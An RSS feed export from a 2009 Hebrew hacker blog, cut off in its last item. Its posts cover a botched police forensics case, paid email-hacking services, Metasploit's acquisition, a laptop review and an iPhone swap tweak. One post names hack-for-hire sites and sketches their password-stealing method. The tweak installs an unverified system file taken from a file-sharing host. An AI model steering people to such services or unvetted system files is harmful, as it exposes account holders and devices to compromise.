<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>‫ZuLL, יומנו של האקר.‬</title>	
	<link>http://www.hacking.org.il</link>
	<description>‫יומנו של האקר הוקם על ידי גיא מזרחי וכיום כותבים בו גם חוקרי אבטחת מידע נוספים.‬</description>	<lastBuildDate>Thu, 29 Oct 2009 13:29:14 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>he</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/org/RZOX" type="application/rss+xml" /><feedburner:emailServiceId>org/RZOX</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item>
		<title>‫שוטר טועה ופדופיל יוצא בזול‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/ooITgQMJAmM/1169</link>
		<comments>http://www.hacking.org.il/1169#comments</comments>
		<pubDate>Thu, 29 Oct 2009 13:29:14 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1169</guid>
		<description><![CDATA[&#8235;קראתי היום בעיתון השקמה על משהו מעצבן ומרגיז.
חיים עטר, תושב חולון בן 56 שהוגדר ע&#34;י המשטרה כאחד מגדולי הפדופילים שפעלו אי פעם בישראל צפוי להגיע להסדר טיעון עם הפרקליטות בו הוא יודה בשלושה מעשי סדום בלבד (המשפט לקוח מהכתבה).
התוצאה תהיה שאותו פדופיל יישב 5 שנים (בלבד) בכלא.
הסיבה היא שאחד מחוקרי המשטרה &#34;מחק בטעות&#34; ראיות מפלילות [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1169&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>קראתי היום בעיתון השקמה על משהו מעצבן ומרגיז.</p>
<p>חיים עטר, תושב חולון בן 56 שהוגדר ע&quot;י המשטרה כאחד מגדולי הפדופילים שפעלו אי פעם בישראל צפוי להגיע להסדר טיעון עם הפרקליטות בו הוא יודה בשלושה מעשי סדום בלבד (המשפט לקוח מהכתבה).</p>
<p>התוצאה תהיה שאותו פדופיל יישב 5 שנים (בלבד) בכלא.</p>
<p>הסיבה היא שאחד מחוקרי המשטרה &quot;מחק בטעות&quot; ראיות מפלילות ממחשבו האישי של עטר.</p>
<p>רק כדי להבין &#8211; בכתב האישום המקורי דובר על 9 מקרי מעשי סדום ומעשים מגונים בילדים ונערים.</p>
<p>פעילותו של עטר התבצעה באמצעות המחשב &#8211; החל משנת 2004 נהג לגלוש באתרי היכרויות להומוסקסואלים ולפנות לנערים צעירים במטרה לקיים עימם יחסי מין.</p>
<p>ברור שהמחשב פה אמור לאפשר לבנות תיק הדוק במיוחד בלי הרבה בעיות להרשיע.</p>
<p>מה שמתואר בכתבה:</p>
<p>&quot;כשניסה אחד החוקרים להעתיק את הכונן הקשיח למחשבי המשטרה, מחק השוטר בטעות חומר מפליל ממחשבו של עטר&quot;.</p>
<p>איך יכול להיות שחוקר מוחק ראיות?</p>
<p>מצער.</p>
<p>אני זמן רב חושב על זה שכדאי להקים &quot;משמר אזרחי&quot; לאינטרנט.</p>
<p>יש לא מעט אנשים שיהיו מוכנים לעזור ולתרום ממרצם וזמנם לאיתור פדופילים ועברייני רשת אחרים.</p>
<p>יש יתרון משמעותי בכך שאנשים שהמחשב והאינטרנט הם תחומי ההתמחות העיקרית שלהם יוכלו לעזור. אין לי ספק שהמשטרה תקבל חיזוק רציני אם זה יקרה.</p>
<p>מי מתנדב?</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1169&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1169/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1169?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫כמה עולה פריצה לשירותי מייל?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/iTJ7PjbLYxY/1166</link>
		<comments>http://www.hacking.org.il/1166#comments</comments>
		<pubDate>Sun, 25 Oct 2009 19:05:58 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1166</guid>
		<description><![CDATA[&#8235;כתבה שקראתי לא מזמן מספרת על מקרה של אישה בשם איליין שחשדה בחבר שלה שהוא בוגד בה.
אפשרות אחת הייתה ללכת לחוקר פרטי אבל היא בחרה להיכנס לאתר בשם yourhackerz.com.
בעלות של 100$ חברי האתר סיפקו לה את סיסמת ה-AOL של המייל של החבר.
100$ נוספים והיא קיבלה את הסיסמה של אשתו.
עוד 100$ והיא קיבלה גם סיסמה של [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1166&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p><a href="http://www.washingtonpost.com/wp-dyn/content/article/2009/09/06/AR2009090602238.html" target="_blank">כתבה</a> שקראתי לא מזמן מספרת על מקרה של אישה בשם איליין שחשדה בחבר שלה שהוא בוגד בה.</p>
<p>אפשרות אחת הייתה ללכת לחוקר פרטי אבל היא בחרה להיכנס לאתר בשם yourhackerz.com.</p>
<p>בעלות של 100$ חברי האתר סיפקו לה את סיסמת ה-AOL של המייל של החבר.</p>
<p>100$ נוספים והיא קיבלה את הסיסמה של אשתו.</p>
<p>עוד 100$ והיא קיבלה גם סיסמה של חברה נוספת של הבחור.</p>
<p>איליין המשיכה את ה&quot;טיפול&quot; בעניין ע&quot;י שיחות טלפון מטרידות (בעזרת שימוש בשירות SPOOFING כמובן שהסווה את קולה וגרמו לה להישמע כגבר).</p>
<p>הדבר משך את תשומת ליבן של חוקרי FBI והתוצאה היא משפט ו-15 חודשים בכלא.</p>
<p><strong>מה שמעניין אותי הוא השירות שסיפקו אנשי האתר.</strong></p>
<p>יש כמה וכמה אתרים שמספקים שירותים דומים:</p>
<p>Piratecrackers.com, hackmail.net ועוד לא מעט אתרים מספקים שירותים כאלה והם מציעים שירותי פריצה גם לחשבונות yahoo, gmail, facebook, hotmail ועוד.</p>
<p>החוקים הפדרליים בארה&quot;ב אמנם אוסרים על פריצות למייל אבל זאת נחשבת עבירה בלבד ולא משהו שייתן טריגר לטיפול בפורץ כל עוד לא נעשתה עבירה נוספת ורצינית על החוק..</p>
<p>איך תדעו שלא עובדים עליכם?</p>
<p>התשלום מתבצע רק לאחר שהם שולחים לכם snapshot של החשבון שאליו הם פרצו – תצלום של תכתובות מייל וכ&quot;ו.</p>
<p>איך הם פורצים לחשבון?</p>
<p>הטענה היא שהשיטה מתבססת על לינק שנשלח אל הקורבן מדביק אותו<strong> </strong>בכלי שאוסף את הסיסמה לשירות בפעם הבאה שהיא מוקלדת ושולח את הסיסמה לתוקף.</p>
<p>בהחלט יכול להיות שהשיטה שונה ומתבססת על פישינג או דברים אחרים.</p>
<p>בקיצור – 100$ לסיסמה.</p>
<p><strong>שימו לב, כיוון שאני צופה מראש את מבול השאלות על העניין:</strong></p>
<p>1. אין לי מושג אם השירותים האלה עובדים או לא. לא ניסיתי ואני לא צריך ולא מתכוון לנסות.</p>
<p>2. האקר אמיתי שיכול לפרוץ חשבונות כאלה יעשה את זה (אם בכלל) בסכום הרבה יותר גבוה &#8211; אין סיכוי שמישהו יעבור על החוק בשביל 100$.</p>
<p>אלפי דולרים נשמע סביר יותר (ולא, אני לא עושה דברים כאלה אם עוד לא הבנתם).</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1166&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1166/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1166?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫Metasploit נמכרה ל-Rapid7‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/r5gEXiuLp90/1159</link>
		<comments>http://www.hacking.org.il/1159#comments</comments>
		<pubDate>Sun, 25 Oct 2009 14:17:46 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1159</guid>
		<description><![CDATA[&#8235;חברת Rapid7 שמתמחה בניהול פגיעויות (Vulnerability Management) רכשה את Metasploit.
המשמעות כנראה תהיה שהמוצר NeXpose- מוצר מסחרי של Rapid7 ישופר ע&#34;י הטמעת הפלטפורמה של Metasploit.
HD Moore יכהן כ-CISO של Rapid7 וארכיטקט ראשי של Metasploit.
ב-LinkedIn של HD יש כבר שינוי  

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1159&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חברת Rapid7 שמתמחה בניהול פגיעויות (Vulnerability Management) רכשה את Metasploit.</p>
<p>המשמעות כנראה תהיה שהמוצר NeXpose- מוצר מסחרי של Rapid7 ישופר ע&quot;י הטמעת הפלטפורמה של Metasploit.</p>
<p>HD Moore יכהן כ-CISO של Rapid7 וארכיטקט ראשי של Metasploit.</p>
<p>ב-LinkedIn של HD יש כבר שינוי <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><img class="aligncenter size-full wp-image-1160" title="linkedin-hd" src="http://www.hacking.org.il/wp-content/uploads/2009/10/hd.png" alt="linkedin-hd" width="560" height="262" /></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1159&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1159/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1159?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫מה פרסום באתר פופולארי עושה לכמות הכניסות?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/O9SMpKUjld4/1150</link>
		<comments>http://www.hacking.org.il/1150#comments</comments>
		<pubDate>Sun, 25 Oct 2009 13:33:00 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[האקינג]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1150</guid>
		<description><![CDATA[&#8235;למי שעוד לא ראה, העיתון כלכליסט פירסם כתבה על כך שבפורומי ההאקינג בחור חביב בשם labba יצר מדריכי וידאו לפתרון האתגרים של השב&#34;כ.
קודם כל, אתחיל ואומר שאני מרגיש לא נוח עם זה שפורסמו פתרונות כאלה אצלי בפורומים אבל זה היה ברור שזה יקרה. אם לא פה, אז במקום אחר.
למעשה, אני שמח שפורום הריוורסינג תופש תאוצה. [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1150&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>למי שעוד לא ראה, העיתון כלכליסט פירסם <a href="http://www.calcalist.co.il/internet/articles/0,7340,L-3364982,00.html" target="_blank">כתבה</a> על כך שב<a href="http://forums.hacking.org.il/" target="_blank">פורומי ההאקינג</a> בחור חביב בשם <a href="http://forums.hacking.org.il/profile.php?mode=viewprofile&amp;u=541" target="_blank">labba</a> יצר <a href="http://forums.hacking.org.il/viewtopic.php?t=4277" target="_blank">מדריכי וידאו לפתרון האתגרים של השב&quot;כ</a>.</p>
<p>קודם כל, אתחיל ואומר שאני מרגיש לא נוח עם זה שפורסמו פתרונות כאלה אצלי בפורומים אבל זה היה ברור שזה יקרה. אם לא פה, אז במקום אחר.</p>
<p>למעשה, אני שמח שפורום הריוורסינג תופש תאוצה. מקווה שזה יקדם את החבר'ה שמסתובבים בפורומים וילמד אותם.</p>
<p>התוצאות הישירות של הפרסום נראו מיד בכמות הכניסות לפורומים. אם ביום רגיל מבקרים בו כ-500 VISITORS (על פי גוגל אנאליטיקס), ביום הפרסום הכמות קפצה ל-1170.</p>
<p><img class="alignright size-full wp-image-1152" title="visitors" src="http://www.hacking.org.il/wp-content/uploads/2009/10/visitors.png" alt="visitors" width="296" height="89" /></p>
<p><img title="sources" src="http://www.hacking.org.il/wp-content/uploads/2009/10/sources.png" alt="sources" width="507" height="114" /></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1150&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1150/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1150?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫קניתי Lenovo X200‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/XG3ZxqeS-Qo/1147</link>
		<comments>http://www.hacking.org.il/1147#comments</comments>
		<pubDate>Fri, 02 Oct 2009 12:25:39 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1147</guid>
		<description><![CDATA[&#8235;מי שמכיר אותי יודע שאני אוהב LapTopים קלים ככל האפשר.
התוספת החדשה לקומונת המחשבים שלי היא X200 של לנובו.
מחשב מדהים ביותר.
סוללה שמספיקה לכ-5 שעות עבודה, מודם סלולרי מובנה, דיסק קשיח ענק.
הבעיה? הוא מגיע עם ויסטה ואני עדיין לא בטוח שאני רוצה לשנות את זה  
הוא פשוט עובד מעולה.
נכון שויסטה זוללת משאבים והיא בערך ה-WINDOWS הכי [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1147&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>מי שמכיר אותי יודע שאני אוהב LapTopים קלים ככל האפשר.</p>
<p>התוספת החדשה לקומונת המחשבים שלי היא X200 של לנובו.</p>
<p>מחשב מדהים ביותר.</p>
<p>סוללה שמספיקה לכ-5 שעות עבודה, מודם סלולרי מובנה, דיסק קשיח ענק.</p>
<p>הבעיה? הוא מגיע עם ויסטה ואני עדיין לא בטוח שאני רוצה לשנות את זה <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>הוא פשוט עובד מעולה.</p>
<p>נכון שויסטה זוללת משאבים והיא בערך ה-WINDOWS הכי גרוע מאז ME אבל על מחשב חזק, היא פשוט עובדת טוב והשימושיות שלה נהדרת.</p>
<p>מצד שני, נורא חסר לי האובונטו שלי כשאני מטייל עם המחשב הזה. בעיקר בגלל הרגל אבל גם בגלל היכולות של LINUX לעשות דברים חביבים עם Aircrack <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  .</p>
<p>מדהים שרק לא מזמן הייתי צריך להתרגל לאובונטו והיום, אני צריך להתרגל מחדש ל-WINDOWS.</p>
<p>חבר אמר לי &#8211; אם כל כך חסר לך אובונטו &#8211; תעשה Dual Boot.</p>
<p>דואל בוט זה להתפשר על הכל. כל פעם RESTART כדי לעבור בין המערכות? למה?</p>
<p>אז למה לא לעבור לגמרי?</p>
<p>במחשבים כאלה זאת בעיה להפעיל הכל בנוחיות כמו שהם מגיעים ואני לא רוצה לאבד את הנוחות.</p>
<p>יש פה המון חומרה ייחודית ומכמה שירשורים שקראתי על הדגם שיש לי, לא הצליחו לפתור את כל הבעיות עד הסוף ולגרום למודם לעבוד במהירות המלאה, לקורא טביעות האצבע לעבוד 100% וכ&quot;ו.</p>
<p>אני אעבוד ל-WINDOWS7 כשייצאו דרייברים רשמיים. עד אז, אני עם VISTA.</p>
<p>מה שכן, putty עדיין עובד הרבה מעל לממוצע על המחשב שלי&#8230;</p>
<p>לגבי ה-X200.. המחשב פשוט מעולה.</p>
<p>אני ממליץ עליו בכל פה ומאוהב בו קשות.</p>
<p>איכות הרכבה מעולה, תכנון מעולה. המחשב פשוט מדהים.</p>
<p>מעניין שלנובו הצליחו לשמור על רמה גבוהה כמו שהיתה בעבר, כשהיו מייצרים מחשבים ל-IBM.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1147&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1147/feed</wfw:commentRss>
		<slash:comments>25</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1147?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫איך להאיץ קצת את ה-iPhone שלכם?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/Wo1IfMhXT6Y/1145</link>
		<comments>http://www.hacking.org.il/1145#comments</comments>
		<pubDate>Fri, 02 Oct 2009 01:08:17 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1145</guid>
		<description><![CDATA[&#8235;התקנתם OS3 באייפון ועכשיו הוא לא זז? יש לזה פתרון.
אפשר לאפשר לאייפון להקצות חלק מהזכרון שלו ל-SWAP וכך בעצם להרוויח מעט יותר זכרון במכשיר. התוצאה אצלי היא שיפור מהותי במהירות.
אמנם חלק מהאנשים אמרו שזה האיט להם את המכשיר אבל אני רואה שיפור של כ-20% בביצועים וזה לא מעט בכלל. המכשיר חזר להיות מהיר  
מה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1145&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>התקנתם OS3 באייפון ועכשיו הוא לא זז? יש לזה פתרון.</p>
<p>אפשר לאפשר לאייפון להקצות חלק מהזכרון שלו ל-SWAP וכך בעצם להרוויח מעט יותר זכרון במכשיר. התוצאה אצלי היא שיפור מהותי במהירות.</p>
<p>אמנם חלק מהאנשים אמרו שזה האיט להם את המכשיר אבל אני רואה שיפור של כ-20% בביצועים וזה לא מעט בכלל. המכשיר חזר להיות מהיר <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>מה החסרונות? אני לא בטוח איזה זכרון FLASH יש באייפון.</p>
<p>אם זה הסוג הזול (MLC) הוא מוגבל לכ-10000 מחזורי קריאה/כתיבה ואם זה הסוג הטוב יותר הוא מוגבל לכ-100000. ז&quot;א שאם אתם מבצעים את השינוי אתם תראו שיפור מהותי בפעולה על חשבון כתיבות רבות יותר לזכרון הזה.</p>
<p>אחרי ההזהרות וההבהרות, איך עושים?</p>
<p>1. מורידים את הקובץ הזה:</p>
<p><a href="http://rapidshare.com/files/287420987/com.apple.dynamic_pager.plist" target="_blank">http://rapidshare.com/files/287420987/com.apple.dynamic_pager.plist</a></p>
<p>2. מתחברים עם winscp או כל תוכנת העברת קבצים אחרת לאייפון שלכם.</p>
<p>3. מעלים את הקובץ אל /System/Library/LaunchDaemons</p>
<p>עושים RESTART למכשיר.</p>
<p>התוצאה תהיה שכמה שניות לאחר ה-RESTART האייפון יהיה איטי. לאחר מכן הוא מהיר מאוד אצלי.</p>
<p>אם מישהו מבצע &#8211; אשמח לשמוע אם השתפר אצלכם המצב.</p>
<p>כל המידע מפה:</p>
<p><a href="http://modmyi.com/forums/general-iphone-chat/681840-iphone-swap-space.html" target="_blank">http://modmyi.com/forums/general-iphone-chat/681840-iphone-swap-space.html</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1145&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1145/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1145?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫אנטיוירוס חינם ממיקרוסופט‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/0INT5MYUJ4A/1140</link>
		<comments>http://www.hacking.org.il/1140#comments</comments>
		<pubDate>Wed, 30 Sep 2009 11:41:50 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1140</guid>
		<description><![CDATA[&#8235;מיקרוסופט השיקה אתמול את האנטיוירוס שלה &#8211; MSE.
MSE הם ראשי התיבות של Microsoft Security Essentials וזהו כינויו של אנטיוירוס שהחברה משיקה בחינם לכל רוכש WINDOWS.
אם נעזוב רגע את האיכות של המוצר (לא בדקתי אותו עדיין), אני חושב שיש כאן מעשה נבון מאוד מצד מיקרוסופט.
1. היא לא מתכוונת להפיץ את MSE כמוצר PRE-INSTALLED ולכן לא מסתכנת [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1140&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>מיקרוסופט השיקה אתמול את האנטיוירוס שלה &#8211; MSE.</p>
<p>MSE הם ראשי התיבות של Microsoft Security Essentials וזהו כינויו של אנטיוירוס שהחברה משיקה בחינם לכל רוכש WINDOWS.</p>
<p>אם נעזוב רגע את האיכות של המוצר (לא בדקתי אותו עדיין), אני חושב שיש כאן מעשה נבון מאוד מצד מיקרוסופט.</p>
<p>1. היא לא מתכוונת להפיץ את MSE כמוצר PRE-INSTALLED ולכן לא מסתכנת באמירות בעייתיות מצד מתחרים בשוק.</p>
<p>2. המוצר יחולק בחינם לכל מי שרכש WINDOWS.</p>
<p>3. מיקרוסופט מעריכה ש-60% ממשתמשי WINDOWS עובדים כרגע ללא אנטיוירוס והיא נותנת להם פתרון.</p>
<p>אין לי ספק שמהלך כזה יחזק את Windows מבחינת אבטחה.</p>
<p>אני מניח שיצרני OEM כן יתקינו את האנטיוירוס הזה כברירת מחדל וכך גם טכנאי PC מזדמנים (כל עוד האנטיוירוס יוכיח עצמו).</p>
<p>מהלך מעולה של מיקרוסופט שנועד להחליף את One-Care &#8211; מה שהיה אמור להיות התשובה של מיקרוסופט ל-MALWARE ומזיקים אחרים.</p>
<p>להורדה: <a href="http://www.microsoft.com/Security_essentials/" target="_blank">http://www.microsoft.com/Security_essentials</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1140&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1140/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1140?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫בלינוקס זה לא היה קורה…‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/rIEE-g2w1Vk/1138</link>
		<comments>http://www.hacking.org.il/1138#comments</comments>
		<pubDate>Sat, 26 Sep 2009 16:43:12 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1138</guid>
		<description><![CDATA[&#8235;זה:
גם זה:
וגם זה:

אבל באייפון &#8211; זה בהחלט קורה..
אגב- נסיון ה-VNC קורה הרבה יותר מפעם אחת.
אני מניח שלא מעט כן מסכימים לזה (בעקבות הפוסט הקודם).
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1138&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>זה:</p>
<p><img class="aligncenter" title="crash" src="http://www.hacking.org.il/wp-content/uploads/2009/09/1.PNG" alt="" width="320" height="480" />גם זה:</p>
<p><img class="aligncenter" title="crash2" src="http://www.hacking.org.il/wp-content/uploads/2009/09/2.PNG" alt="" width="320" height="480" />וגם זה:</p>
<p><img class="aligncenter" title="crash3" src="http://www.hacking.org.il/wp-content/uploads/2009/09/3.PNG" alt="" width="320" height="480" /></p>
<p>אבל באייפון &#8211; זה בהחלט קורה..</p>
<p>אגב- נסיון ה-VNC קורה הרבה יותר מפעם אחת.</p>
<p>אני מניח שלא מעט כן מסכימים לזה (בעקבות הפוסט הקודם).</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1138&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1138/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1138?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫פוסט מעולה אצל איתן כספי.‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/5xXABMnN3_w/1135</link>
		<comments>http://www.hacking.org.il/1135#comments</comments>
		<pubDate>Sat, 26 Sep 2009 14:28:38 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1135</guid>
		<description><![CDATA[&#8235;לכן לקרוא פה:
http://security.caspi.org.il/?p=1187
לא רוצה להרוס לכם.
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1135&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>לכן לקרוא פה:</p>
<p><a href="http://security.caspi.org.il/?p=1187">http://security.caspi.org.il/?p=1187</a></p>
<p>לא רוצה להרוס לכם.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1135&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1135/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1135?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫Certificate חוקי או לא? למשתמשים זה לא ממש משנה..‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/Mk7L7xdexZw/1132</link>
		<comments>http://www.hacking.org.il/1132#comments</comments>
		<pubDate>Fri, 25 Sep 2009 13:48:08 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1132</guid>
		<description><![CDATA[&#8235;קראתי לא מזמן כתבה מ-themarker שמתארת מחקר שהתבצע בנושא ה-SSL ו-CERTIFICATES החוקיים.
